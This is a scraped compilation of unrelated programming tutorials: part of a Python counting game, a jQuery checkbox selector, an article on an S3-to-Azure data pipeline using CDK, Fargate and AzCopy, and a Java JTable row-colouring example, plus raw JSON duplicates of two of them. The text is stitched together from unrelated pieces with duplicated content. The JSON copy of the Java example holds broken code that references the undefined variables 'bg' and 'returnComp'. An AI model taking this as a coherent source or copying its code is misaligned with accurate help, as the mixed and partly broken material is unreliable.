                        lose1()
                    i, j = 1, 1
                    print("Now enter the values")
                    while i <= inp:
                        a = int(input('> '))
                        xyz.append(a)
                        i = i + 1

                    # store the last element of xyz
                    last = xyz[-1]

                    # check whether the input numbers are consecutive
                    if check(xyz) == True:
                        if last == 21:
                            lose1()
                        else:
                            # computer's turn
                            while j <= comp:
                                xyz.append(last + j)
                                j = j + 1
                            print("Order of inputs after computer's turn is: ")
                            print(xyz)
                            last = xyz[-1]
                    else:
                        print("\nYou did not input consecutive integers.")
                        lose1()

        # player takes the second chance
        elif chance == "S":
            comp = 1
            last = 0
            while last < 20:
                # computer's turn
                j = 1
                while j <= comp:
                    xyz.append(last + j)
                    j = j + 1
                print("Order of inputs after computer's turn is:")
                print(xyz)
                if xyz[-1] == 20:
                    lose1()
                else:
                    print("\nYour turn.")
                    print("\nHow many numbers do you wish to enter?")
                    inp = int(input('> '))
                    i = 1
                    print("Enter your values")
                    while i <= inp:
                        xyz.append(int(input('> ')))
                        i = i + 1
                    last = xyz[-1]
                    if check(xyz) == True:
                        # move towards the nearest multiple of 4
                        near = nearestMultiple(last)
                        comp = near - last
                        if comp == 4:
                            comp = 3
                    else:
                        # inputs not consecutive: automatically disqualified
                        print("\nYou did not input consecutive integers.")
                        lose1()
            print("\n\nCONGRATULATIONS !!!")
            print("YOU WON !")
            exit(0)
        else:
            print("wrong choice")

game = True
while game == True:
    print("Player 2 is Computer.")
    print("Do you want to play the 21 number game? (Yes / No)")
    ans = input('> ')
    if ans == 'Yes':
        start1()
    else:
        print("Do you want to quit the game? (yes / no)")
        nex = input('> ')
        if nex == "yes":
            print("You are quitting the game...")
            exit(0)
        elif nex == "no":
            print("Continuing...")
        else:
            print("Wrong choice")

Output:
Player 2 is Computer.
Do you want to play the 21 number game? (Yes / No)
> Yes
Enter 'F' to take the first chance.
Enter 'S' to take the second chance.
> S
Order of inputs after computer's turn is:
[1]

Your turn.

How many numbers do you wish to enter?
> 3
Enter your values
> 2
> 3
> 4
Order of inputs after computer's turn is:
[1, 2, 3, 4, 5, 6, 7]

Your turn.

How many numbers do you wish to enter?
> 1
Enter your values
> 8
Order of inputs after computer's turn is:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]

Your turn.

How many numbers do you wish to enter?
> 1
Enter your values
> 12
Order of inputs after computer's turn is:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]

Your turn.

How many numbers do you wish to enter?
> 1
Enter your values
> 16
Order of inputs after computer's turn is:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]

Your turn.

How many numbers do you wish to enter?
> 1
Enter your values
> 20

CONGRATULATIONS !!!
YOU WON !

Try it yourself as an exercise:

You can further enhance the program by increasing the number of players.
You can also use only even/odd numbers.
You can replace the numbers with the binary number system.
You can add levels with variations in the game.
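The multiple-of-4 strategy described earlier generalizes to such variations. The helper below is an illustrative sketch (the function name and parameters are not part of the original program) that computes the numbers you want to finish your turn on, for any target number and per-turn limit:

def safe_numbers(target=21, max_per_turn=3):
    """Numbers to finish your turn on.

    Whoever is forced to say `target` loses, so you aim to end each
    turn on target - 1 and, before that, on numbers spaced
    (max_per_turn + 1) apart below it."""
    step = max_per_turn + 1
    return [n for n in range(1, target) if n % step == (target - 1) % step]

print(safe_numbers())       # [4, 8, 12, 16, 20] -- the multiples of 4
print(safe_numbers(31, 3))  # the same idea for a count-to-31 variation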
How to get value from the first checkbox which is not hidden in jQuery?
To get the value of the first checked checkbox that is not hidden, use the :visible selector. Following is the code −

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<style>
   .notShown {
      display: none;
   }
</style>
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
</head>
<body>
<div class='form'>
<input class="demo notShown" type="checkbox" value="first" checked="checked" />
<br />
<input class="demo" type="checkbox" value="second" checked="checked" />
<br />
<input class="demo" type="checkbox" value="third" />
<br />
<input class="demo" type="checkbox" value="fourth" checked="checked" />
</div>
<script>
   var v = $('input:checkbox:checked:visible:first').val();
   console.log(v);
</script>
</body>
</html>

To run the above program, save the file as "anyName.html" (or index.html) and right-click on the file. Select the option "Open with Live Server" in the VS Code editor.

This will produce the following output, displaying the value of the first visible checked checkbox, "second", in the console −

second
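The same selection can also be written with chained traversal methods instead of one compound selector. This is an equivalent sketch, assuming the markup above:

// equivalent to $('input:checkbox:checked:visible:first').val()
var value = $('input[type="checkbox"]:checked')
   .filter(':visible')  // drops the hidden "first" checkbox
   .first()             // takes the first remaining match
   .val();
console.log(value);     // "second"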
Building an Event-Driven Data Pipeline to Copy Data from Amazon S3 to Azure Storage | by Yi Ai | Towards Data Science
It may be a requirement of your business to move a good amount of data periodically from one public cloud to another. More specifically, you may face mandates requiring a multi-cloud solution. This article covers one approach to automating data replication from an AWS S3 bucket to a Microsoft Azure Blob Storage container using Amazon S3 Inventory, Amazon S3 Batch Operations, Fargate, and AzCopy.

Your company produces new CSV files on-premises every day, with a total size of around 100 GB after compression. All files have a size of 1–2 GB and need to be uploaded to Amazon S3 every night in a fixed time window between 3 am and 5 am. Your business has decided to copy those CSV files from S3 to Microsoft Azure Storage after all files have been uploaded to S3. You have to find an easy and fast way to automate the data replication workflow.

To accomplish this task, we can build a data pipeline that copies data periodically from S3 to Azure Storage using AWS Data Wrangler, Amazon S3 Inventory, Amazon S3 Batch Operations, Athena, Fargate, and AzCopy.

The diagram below represents the high-level architecture of the pipeline solution:

Create a VPC with private and public subnets, S3 endpoints, and a NAT gateway.

Create an Azure Storage account and blob container, generate a SAS token, then add a firewall rule to allow traffic from the AWS VPC to Azure Storage.

Configure daily S3 inventory reports on the S3 bucket.

Use Athena to filter only the new objects from the S3 inventory reports and export those objects' bucket names and object keys to a CSV manifest file.

Use the exported CSV manifest file to create an S3 Batch Operations PUT copy job that copies the objects to a destination S3 bucket with a lifecycle-policy expiration rule configured.

Set up an EventBridge rule that invokes a Lambda function to run a Fargate task, which copies all objects with the same prefix in the destination bucket to the Azure Storage container.

Prerequisites:

Set up an AWS account
Set up an Azure account
Install the latest AWS CLI
Install the AWS CDK CLI
Basic understanding of AWS CDK
Basic understanding of Docker

We use CDK to build our infrastructure on AWS. First, let's create a source bucket to receive files from external providers or on-premises systems, and set up daily inventory reports that provide a flat-file list of the objects and their metadata.

Next, create a destination bucket as temporary storage, with a lifecycle-policy expiration rule configured on the prefix /tmp_transition. All files with that prefix (e.g. /tmp_transition/file1.csv) will be copied to Azure and then removed by the lifecycle policy after 24 hours. The bucket definitions in the CDK stack look like the sketch below.
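The full stack definition lives in the GitHub repository linked in the conclusion; the following is a minimal CDK (v1, Python) sketch of the two bucket definitions, in which the construct IDs and inventory prefix are illustrative:

from aws_cdk import core
from aws_cdk import aws_s3 as s3

class DataPipelineStack(core.Stack):
    def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
        super().__init__(scope, id, **kwargs)

        # Destination bucket: temporary storage where objects under
        # tmp_transition/ expire one day after creation.
        destination_bucket = s3.Bucket(
            self, "DestinationBucket",
            lifecycle_rules=[
                s3.LifecycleRule(
                    prefix="tmp_transition",
                    expiration=core.Duration.days(1),
                )
            ],
        )

        # Source bucket: receives the nightly CSV uploads and writes a
        # daily CSV inventory report into the destination bucket.
        source_bucket = s3.Bucket(
            self, "SourceBucket",
            inventories=[
                s3.Inventory(
                    destination=s3.InventoryDestination(
                        bucket=destination_bucket,
                        prefix="inventory",
                    ),
                    frequency=s3.InventoryFrequency.DAILY,
                    format=s3.InventoryFormat.CSV,
                    include_object_versions=s3.InventoryObjectVersion.CURRENT,
                )
            ],
        )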
Next, we need to create a VPC with both public and private subnets, a NAT gateway, and an S3 endpoint, and attach an endpoint policy that allows the Fargate container to access the S3 bucket from which we copy data to Azure. Define the VPC and its related resources in the same CDK stack (the full definition is in the project repository linked at the end of this article).

While creating the NAT gateway, an Elastic IP address is created in AWS. We will need that IP address to set up the Azure Storage firewall rule in step 3.

To simplify managing resources, we can use an Azure Resource Manager (ARM) template to deploy resources at our Azure subscription level. I will assume you already have an Azure subscription set up. We will use Cloud Shell to deploy a resource group, an Azure Storage account, a container, and a firewall rule that allows traffic from a specific IP address.

Click on the Cloud Shell icon in the Azure Portal's header bar, and it will open the Cloud Shell. Run the following commands to deploy:

az group create --name examplegroup --location australiaeast
az deployment group create --resource-group examplegroup --template-uri https://raw.githubusercontent.com/yai333/DataPipelineS32Blob/master/Azure-Template-DemoRG/template.json --parameters storageAccounts_mydemostroageaccount_name=mydemostorageaccountaiyi --debug

Once the template has been deployed, we can verify the deployment by exploring the resource group in the Azure portal. All deployed resources will be displayed in the Overview section of the resource group.

Let's create a firewall rule for our storage account:

Firstly, go to the storage account we just deployed.
Secondly, click on the settings menu called Firewalls and virtual networks.
Thirdly, check that you've selected to allow access from Selected networks.
Then, to grant access to an internet IP range, enter the AWS VPC's public IP address (from step 2) and Save.

We will then generate a Shared Access Signature (SAS) to grant limited access to Azure Storage resources. Run the commands below in Cloud Shell:

RG_NAME='examplegroup'
ACCOUNT_NAME='mydemostorageaccountaiyi'
ACCOUNT_KEY=`az storage account keys list --account-name=$ACCOUNT_NAME --query [0].value -o tsv`
BLOB_CONTAINER=democontainer
STORAGE_CONN_STRING=`az storage account show-connection-string --name $ACCOUNT_NAME --resource-group $RG_NAME --output tsv`
SAS=`az storage container generate-sas --connection-string $STORAGE_CONN_STRING -n $BLOB_CONTAINER --expiry '2021-06-30' --permissions aclrw --output tsv`
echo $SAS

We will get the required SAS token, which grants (a)dd, (d)elete, (r)ead, and (w)rite access to the blob container democontainer:

se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D

Let's move back to AWS and put the SAS token into the AWS SSM Parameter Store. Run the following command in a local terminal:

aws ssm put-parameter --cli-input-json '{ "Name": "/s3toblob/azure/storage/sas", "Value": "se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D", "Type": "SecureString"}'

Now let's move on to the Lambda functions. We will create three Lambda functions and one Lambda layer:

fn_create_s3batch_manifest and DataWranglerLayer
fn_create_batch_job
fn_process_transfer_task

The first Lambda function uses the Athena module of AWS Data Wrangler to filter the new files from the past UTC date and save the file list to a CSV manifest file. Add the function and its layer to the CDK stack (download the AWS Data Wrangler layer zip file from the library's releases page), then create ./src/lambda_create_s3batch_manifest.py; the full source is in the project repository.

In that Lambda, we use Athena queries to create a Glue database and table and to add a partition to the table every day. The Lambda then executes an EXCEPT query to return the difference between the two date partitions. Note that start_query_execution is asynchronous, hence there is no need to wait for the result in the Lambda. Once the query has executed, the result is saved as a CSV file to s3_output=f"s3://{os.getenv('DESTINATION_BUCKET_NAME')}/csv_manifest/dt={partition_dt}".

Next, we create the Lambda function fn_create_batch_job and enable Amazon S3 to send a notification that triggers fn_create_batch_job whenever a CSV file is added under the /csv_manifest prefix of the bucket (both the stack wiring and ./src/lambda_create_batch_job.py are in the repository). The fn_create_batch_job function creates an S3 Batch Operations PUT copy job that copies all the files listed in the CSV manifest to the /tmp_transition prefix of the destination S3 bucket; a sketch of the underlying API call follows.
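The complete Lambda source is in the project repository; the sketch below shows the shape of the boto3 s3control create_job call it is built around (the helper name, priority value, report prefix, and ARN handling are illustrative):

import boto3

s3control = boto3.client("s3control")

def create_copy_job(account_id, manifest_bucket, manifest_key,
                    manifest_etag, destination_bucket_arn, role_arn):
    # Each line of the CSV manifest holds "bucket,key" for one object.
    return s3control.create_job(
        AccountId=account_id,
        ConfirmationRequired=False,
        RoleArn=role_arn,
        Priority=10,
        Operation={
            "S3PutObjectCopy": {
                "TargetResource": destination_bucket_arn,
                "TargetKeyPrefix": "tmp_transition",
            }
        },
        Manifest={
            "Spec": {
                "Format": "S3BatchOperations_CSV_20180820",
                "Fields": ["Bucket", "Key"],
            },
            "Location": {
                "ObjectArn": f"arn:aws:s3:::{manifest_bucket}/{manifest_key}",
                "ETag": manifest_etag,
            },
        },
        Report={
            "Enabled": True,
            "Bucket": destination_bucket_arn,
            "Format": "Report_CSV_20180820",
            "Prefix": "batch-job-reports",
            "ReportScope": "AllTasks",
        },
    )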
S3 Batch Operations is an Amazon S3 data management feature that lets you manage billions of objects at scale. To start an S3 Batch Operations job, we also need to set up an IAM role, S3BatchRole, with the corresponding policies (also defined in the CDK stack).

We will then create an EventBridge custom rule that tracks S3 Batch Operations job events in Amazon EventBridge through AWS CloudTrail and sends events with Completed status to the target notification resource, fn_process_transfer_task. That Lambda (./src/lambda_process_s3transfer_task.py in the repository) then programmatically starts a Fargate task that copies the files under the /tmp_transition prefix to the Azure Storage container democontainer.

Now we have set up the serverless part. Let's move on to the Fargate task that performs the data replication. We will create:

An ECR image with AzCopy installed. AzCopy is a command-line utility that you can use to copy blobs or files to or from a storage account.
An ECS cluster with a Fargate task.

Let's get started.

1. Build the ECS, ECR, and Fargate stack.

2. Build a Docker image and install AzCopy in it. Note that for AzCopy to transfer files from AWS, we need to set up AWS credentials in the container. Within a Fargate task, we can retrieve them from the task metadata endpoint:

curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

3. Push the Docker image to ECR:

eval $(aws ecr get-login --region ap-southeast-2 --no-include-email)
docker build . -t YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAME
docker push YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAME

Great! We have everything we need. You can find the full solution CDK project in my GitHub repo. Clone the repo and deploy the stack:

cd CDK-S3toblob
pip install -r requirements.txt
cdk deploy

Once the stack has been successfully created, navigate to the AWS CloudFormation console, locate the stack we just created, and go to the Resources tab to find the deployed resources.

Now it's time to test our workflow. Go to the S3 source bucket demo-databucket-source and upload files into different folders (prefixes). Wait up to 24 hours for the next inventory report to be generated; then you will see the whole pipeline start running, and the files will eventually be copied to the Azure container democontainer. The Fargate task's logs in CloudWatch will confirm the transfer, and we can also monitor, troubleshoot, and set alarms for the ECS resources using CloudWatch Container Insights.

In this article, I introduced an approach to automating data replication from AWS S3 to Microsoft Azure Storage. I walked you through using CDK to deploy VPC, S3, Lambda, CloudTrail, and Fargate resources; showed how to deploy the Azure services with an ARM template; and showed how to use the AWS Data Wrangler library and Athena queries to create and query a table.

I hope you have found this article useful. You can find the complete project in my GitHub repo. For completeness, a sketch of the AzCopy invocation at the heart of the Fargate task follows.
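The task's real entrypoint script is in the repository; roughly, after exporting the AWS credentials retrieved from the task metadata endpoint and reading the SAS token from SSM, the container runs a command of the following shape (the destination bucket name shown here is illustrative):

# AzCopy v10 can read directly from S3 once AWS credentials are exported
export AWS_ACCESS_KEY_ID=...      # taken from the task metadata endpoint
export AWS_SECRET_ACCESS_KEY=...  # (plus a session token for temporary credentials)

azcopy copy \
  "https://s3.ap-southeast-2.amazonaws.com/demo-databucket-destination/tmp_transition" \
  "https://mydemostorageaccountaiyi.blob.core.windows.net/democontainer/?${SAS}" \
  --recursive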
[ { "code": null, "e": 564, "s": 172, "text": "It may be a requirement of your business to move a good amount of data periodically from one public cloud to another. More specifically, you may face mandates requiring a multi-cloud solution. This article covers one approach to automate data replication from AWS S3 Bucket to Microsoft Azure Blob Storage container using Amazon S3 Inventory, Amazon S3 Batch Operations, Fargate, and AzCopy." }, { "code": null, "e": 1001, "s": 564, "text": "Your company produces new CSV files on-premises every day with a total size of around 100GB after compression. All files have a size of 1–2 GB and need to be uploaded to Amazon S3 every night in a fixed time window between 3 am, and 5 am. Your business has decided to copy those CSV files from S3 to Microsoft Azure Storage after all files uploaded to S3. You have to find an easy and fast way to automate the data replication workflow." }, { "code": null, "e": 1209, "s": 1001, "text": "To accomplish this task, we can build a data pipeline to copy data periodically from S3 to Azure Storage using AWS Data Wrangler, Amazon S3 Inventory, Amazon S3 Batch Operations, Athena, Fargate, and AzCopy." }, { "code": null, "e": 1292, "s": 1209, "text": "The diagram below represents the high-level architecture of the pipeline solution:" }, { "code": null, "e": 1369, "s": 1292, "text": "Create a VPC with private and public subnets, S3 endpoints, and NAT gateway." }, { "code": null, "e": 1516, "s": 1369, "text": "Create an Azure Storage account and blob container, generate a SAS token, then add a firewall rule to allow traffic from AWS VPC to Azure Storage." }, { "code": null, "e": 1571, "s": 1516, "text": "Configure daily S3 Inventory Reports on the S3 bucket." }, { "code": null, "e": 1716, "s": 1571, "text": "Use Athena to filter only the new objects from S3 inventory reports and export those objects’ bucket names & object keys to a CSV manifest file." }, { "code": null, "e": 1890, "s": 1716, "text": "Use exported CSV manifest file to create an S3 Batch Operations PUT copy Job that copies objects to a destination S3 bucket with lifecycle policy expiration rule configured." }, { "code": null, "e": 2055, "s": 1890, "text": "Setup an Eventbridge rule, invoke lambda function to run Fargate task that copies all objects with the same prefix in destination bucket to Azure Storage container." }, { "code": null, "e": 2076, "s": 2055, "text": "Setup an AWS account" }, { "code": null, "e": 2099, "s": 2076, "text": "Setup an Azure account" }, { "code": null, "e": 2126, "s": 2099, "text": "Install the latest AWS-CLI" }, { "code": null, "e": 2146, "s": 2126, "text": "Install AWS CDK-CLI" }, { "code": null, "e": 2177, "s": 2146, "text": "Basic understanding of AWS CDK" }, { "code": null, "e": 2207, "s": 2177, "text": "Basic understanding of Docker" }, { "code": null, "e": 2440, "s": 2207, "text": "We use CDK to build our infrastructure on AWS. First, let’s create a source Bucket to receive files from external providers or on-premise and set up daily inventory reports that provide a flat-file list of your objects and metadata." }, { "code": null, "e": 2703, "s": 2440, "text": "Next, create a destination bucket as temporary storage with lifecycle policy expiration rule configured on prefix /tmp_transition. All files with the prefix (eg. /tmp_transition/file1.csv) will copy to Azure and will be removed by lifecycle policy after 24hours." }, { "code": null, "e": 2748, "s": 2703, "text": "Use the following code to create S3 buckets." 
}, { "code": null, "e": 2966, "s": 2748, "text": "Next, we need to create VPC with both public and private subnets, NAT Gateway, an S3 endpoint, and attach an endpoint policy that allows access to the Fargate container to which S3 bucket we are copying data to Azure." }, { "code": null, "e": 3034, "s": 2966, "text": "Now define your VPC and related resources using the following code." }, { "code": null, "e": 3184, "s": 3034, "text": "While creating NAT Gateway, an Elastic IP Address will create in AWS. We will need the IP address to set up the Azure Storage Firewall rule in step3." }, { "code": null, "e": 3331, "s": 3184, "text": "To simplify managing resources, we can use the Azure Resource Manager template (ARM template) to deploy resources at our Azure subscription level." }, { "code": null, "e": 3542, "s": 3331, "text": "I will assume you already have an Azure Subscription setup. We will use Cloud shell to deploy a Resource Group, Azure Storage account, a container, and Firewall rule to allow traffic from a specific IP address." }, { "code": null, "e": 3640, "s": 3542, "text": "Click on the Cloud Shell icon in the Azure Portal's header bar, and it will open the Cloud Shell." }, { "code": null, "e": 3677, "s": 3640, "text": "Run the following command to deploy:" }, { "code": null, "e": 4002, "s": 3677, "text": "az group create --name examplegroup --location australiaeastaz deployment group create --resource-group examplegroup --template-uri https://raw.githubusercontent.com/yai333/DataPipelineS32Blob/master/Azure-Template-DemoRG/template.json --parameters storageAccounts_mydemostroageaccount_name=mydemostorageaccountaiyi --debug" }, { "code": null, "e": 4204, "s": 4002, "text": "Once the template has been deployed, we can verify the deployment by exploring the Azure portal's resource group. All resources deployed will be displayed in the Overview section of the Resource group." }, { "code": null, "e": 4258, "s": 4204, "text": "Let’s create a Firewall rule for our Storage Account:" }, { "code": null, "e": 4311, "s": 4258, "text": "Firstly, go to the storage account we just deployed." }, { "code": null, "e": 4387, "s": 4311, "text": "Secondly, click on the settings menu called Firewalls and virtual networks." }, { "code": null, "e": 4463, "s": 4387, "text": "Thirdly, check that you’ve selected to allow access from Selected networks." }, { "code": null, "e": 4567, "s": 4463, "text": "Then, for granting access to an internet IP range, enter AWS VPC’s public IP address (step 2) and Save." }, { "code": null, "e": 4672, "s": 4567, "text": "We will then generate Shared Access Signatures (SAS) to grant limited access to Azure Storage resources." }, { "code": null, "e": 4705, "s": 4672, "text": "Run below command in Cloudshell:" }, { "code": null, "e": 5178, "s": 4705, "text": "RG_NAME='examplegroup'ACCOUNT_NAME='mydemostorageaccountaiyi' ACCOUNT_KEY=`az storage account keys list --account-name=$ACCOUNT_NAME --query [0].value -o tsv`BLOB_CONTAINER=democontainerSTORAGE_CONN_STRING=`az storage account show-connection-string --name $ACCOUNT_NAME --resource-group $RG_NAME --output tsv`SAS=`az storage container generate-sas --connection-string $STORAGE_CONN_STRING -n $BLOB_CONTAINER --expiry '2021-06-30' --permissions aclrw --output tsv`echo $SAS" }, { "code": null, "e": 5299, "s": 5178, "text": "We will get the required SAS and URLs that grant (a)dd (d)elete (r)ead (w)rite access to a blob container democontainer." 
}, { "code": null, "e": 5392, "s": 5299, "text": "se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D" }, { "code": null, "e": 5455, "s": 5392, "text": "Let’s move back to AWS and put SAS to AWS SSM Parameter Store." }, { "code": null, "e": 5498, "s": 5455, "text": "Run following command in local terminator." }, { "code": null, "e": 5712, "s": 5498, "text": "aws ssm put-parameter --cli-input-json '{ \"Name\": \"/s3toblob/azure/storage/sas\", \"Value\": \"se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D\", \"Type\": \"SecureString\"}'" }, { "code": null, "e": 5812, "s": 5712, "text": "Now, let’s move up to lambda functions. We will create three lambda functions and one lambda layer:" }, { "code": null, "e": 5861, "s": 5812, "text": "fn_create_s3batch_manifest and DataWranglerLayer" }, { "code": null, "e": 5881, "s": 5861, "text": "fn_create_batch_job" }, { "code": null, "e": 5906, "s": 5881, "text": "fn_process_transfer_task" }, { "code": null, "e": 6051, "s": 5906, "text": "This lambda function uses AWS Data Wrangler’s Athena module to filter new files in the past UTC date and save files list to a CSV manifest file." }, { "code": null, "e": 6137, "s": 6051, "text": "Copy the following code to CDK stack.py. download awswranger-layerzip file from here." }, { "code": null, "e": 6214, "s": 6137, "text": "then create ./src/lambda_create_s3batch_manifest.py with the following code:" }, { "code": null, "e": 6423, "s": 6214, "text": "In the above coding, we use Athena query to create Glue Database, Table and add a partition to that table every day. Then lambda executes except query to return the difference between the two date partitions." }, { "code": null, "e": 6675, "s": 6423, "text": "Note that start_query_execution is asynchronous, hence no need to wait for the result in Lambda. Once the query is executed, the result will save to s3_output=f\"s3://{os.getenv('DESTINATION_BUCKET_NAME')}/csv_manifest/dt={partition_dt}\" as a CSV file." }, { "code": null, "e": 6926, "s": 6675, "text": "In this section, we will create a lambda function fn_create_batch_job and enable Amazon S3 to send a notification to trigger fn_create_batch_job when a CSV file is added to an Amazon S3 Bucket /csv_manifest prefix. Put following code to CDK stack.py:" }, { "code": null, "e": 6991, "s": 6926, "text": "Create ./src/lambda_create_batch_job.py with the following code:" }, { "code": null, "e": 7150, "s": 6991, "text": "Lambda fn_create_batch_job function create S3 Batch Operation Job, copy all the files listed in CSV manifest to S3 Destination Bucket /tmp_transition prefix ." }, { "code": null, "e": 7377, "s": 7150, "text": "S3 Batch Operations is an Amazon S3 data management feature that lets you manage billions of objects at scale. To start an S3 Batch Operation Job, we also need to set up an IAM role S3BatchRole with the corresponding policies:" }, { "code": null, "e": 7602, "s": 7377, "text": "We will create an Eventbridge custom rule that tracks an S3 Batch Operations job in Amazon EventBridge through AWS CloudTrail and send events in Completed status to the target notification resource fn_process_transfer_task ." }, { "code": null, "e": 7765, "s": 7602, "text": "Lambda fn_process_transfer_task will then start a Fargate Task programmatically to copy files in /tmp_transition prefix to Azure Storage Container democontainer ." 
}, { "code": null, "e": 7837, "s": 7765, "text": "Create ./src/lambda_process_s3transfer_task.py with the following code:" }, { "code": null, "e": 7946, "s": 7837, "text": "Now, We have set up the Serverless part. Let’s move up to the Fargate task and process the data replication." }, { "code": null, "e": 7962, "s": 7946, "text": "We will create:" }, { "code": null, "e": 8105, "s": 7962, "text": "An ECR image with AzCopy was installed. AzCopy is a command-line utility that you can use to copy blobs or files to or from a storage account." }, { "code": null, "e": 8140, "s": 8105, "text": "An ECS Cluster with a Fargte task." }, { "code": null, "e": 8163, "s": 8140, "text": "Let’s getting started." }, { "code": null, "e": 8198, "s": 8163, "text": "Build ECS, ECR, and Fargate stack." }, { "code": null, "e": 8233, "s": 8198, "text": "Build ECS, ECR, and Fargate stack." }, { "code": null, "e": 8283, "s": 8233, "text": "2. Build a Docker image and install Azcopy there." }, { "code": null, "e": 8428, "s": 8283, "text": "Note that to use AzCopy transfer files from AWS, we will need to set up AWS Credentials in the container. We can retrieve AWS credentials using:" }, { "code": null, "e": 8494, "s": 8428, "text": "curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" }, { "code": null, "e": 8522, "s": 8494, "text": "3. Push Docker image to ECR" }, { "code": null, "e": 8753, "s": 8522, "text": "eval $(aws ecr get-login --region ap-southeast-2 --no-include-email)docker build . -t YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAMEdocker push YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAME" }, { "code": null, "e": 8881, "s": 8753, "text": "Great! We have what we need! You can find the full solution CDK project in my Github Repo. Clone the repo and deploy the stack:" }, { "code": null, "e": 8939, "s": 8881, "text": "cd CDK-S3toblob pip install -r requirements.txtcdk deploy" }, { "code": null, "e": 9123, "s": 8939, "text": "Once the stack has been successfully created, navigate to the AWS CloudFormation console, locate the stack we just created, and go to the Resources tab to find the deployed resources." }, { "code": null, "e": 9432, "s": 9123, "text": "Now it’s time to test our workflow; go to the S3 source bucket demo-databucket-source . Upload as many files in different folders (prefix). Wait 24 hours for the next inventory report generated; then, you will see the whole pipeline start running, and files will eventually be copied to Azure democontainer ." }, { "code": null, "e": 9502, "s": 9432, "text": "We should see the logs of the Fargate task like the below screenshot." }, { "code": null, "e": 9607, "s": 9502, "text": "We can also monitor, troubleshoot, and set alarms for ECS resources using CloudWatch Container Insights." }, { "code": null, "e": 9987, "s": 9607, "text": "In this article, I introduced the approach to automate data replication from AWS S3 to Microsoft Azure Storage. I walked you through how to use CDK to deploy VPC, AWS S3, Lambda, Cloudtrail, Fargte resources, showing you how to use the ARM template deploy Azure services. I showed you how to use the AWS Wrangler library and Athena query to create a table and querying the table." } ]
How to set the color to alternate rows of JTable in Java?
A JTable is a subclass of the JComponent class, and it can be used to display a table of information in multiple rows and columns. When the data in a JTable changes, a TableModelEvent is generated, which can be handled by implementing the TableModelListener interface. We can set the color of alternate rows of a JTable by overriding the prepareRenderer() method of the JTable class.

public Component prepareRenderer(TableCellRenderer renderer, int row, int column)

import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
import javax.swing.table.*;
public class AlternateRowColorTableTest extends JFrame {
   public AlternateRowColorTableTest() {
      setTitle("AlternateRowColorTable Test");
      JTable table = new JTable(new Object[][] {{"115", "Ramesh"}, {"120", "Adithya"}, {"125", "Jai"}, {"130", "Chaitanya"}, {"135", "Raja"}}, new String[] {"Employee Id", "Employee Name"}) {
         public Component prepareRenderer(TableCellRenderer renderer, int row, int column) {
            Component comp = super.prepareRenderer(renderer, row, column);
            Color alternateColor = new Color(200, 201, 210);
            Color whiteColor = Color.WHITE;
            // Leave rows that are currently selected with the selection color
            if(!comp.getBackground().equals(getSelectionBackground())) {
               // Even rows get the alternate color, odd rows stay white
               Color c = (row % 2 == 0 ? alternateColor : whiteColor);
               comp.setBackground(c);
            }
            return comp;
         }
      };
      add(new JScrollPane(table));
      setSize(400, 300);
      setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
      setLocationRelativeTo(null);
      setVisible(true);
   }
   public static void main(String[] args) {
      new AlternateRowColorTableTest();
   }
}
[ { "code": null, "e": 1336, "s": 1062, "text": "A JTable is a subclass of JComponent class and it can be used to create a table with information displayed in multiple rows and columns. When a value is selected from a JTable, a TableModelEvent is generated, which is handled by implementing a TableModelListener interface." }, { "code": null, "e": 1445, "s": 1336, "text": "We can set the color to alternate rows of JTable by overriding the prepareRenderer() method of JTable class." }, { "code": null, "e": 1527, "s": 1445, "text": "public Component prepareRenderer(TableCellRenderer renderer, int row, int column)" }, { "code": null, "e": 2773, "s": 1527, "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\nimport javax.swing.table.*;\npublic class AlternateRowColorTableTest extends JFrame {\n public AlternateRowColorTableTest() {\n setTitle(\"AlternateRowColorTable Test\");\n JTable table = new JTable(new Object[][] {{\"115\", \"Ramesh\"}, {\"120\", \"Adithya\"}, {\"125\", \"Jai\"}, {\"130\", \"Chaitanya\"}, {\"135\", \"Raja\"}}, new String[] {\"Employee Id\", \"Employee Name\"}) {\n public Component prepareRenderer(TableCellRenderer renderer, int row, int column) {\n Component comp = super.prepareRenderer(renderer, row, column);\n Color alternateColor = new Color(200, 201, 210);\n Color whiteColor = Color.WHITE;\n if(!comp.getBackground().equals(getSelectionBackground())) {\n Color c = (row % 2 == 0 ? alternateColor : whiteColor);\n comp.setBackground(bg);\n c = null;\n }\n return returnComp;\n }\n };\n add(new JScrollPane(table));\n setSize(400, 300);\n setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n setLocationRelativeTo(null);\n setVisible(true);\n }\n public static void main(String[] args) {\n new AlternateRowColorTableTest();\n }\n}" } ]
How to get installed windows update using PowerShell?
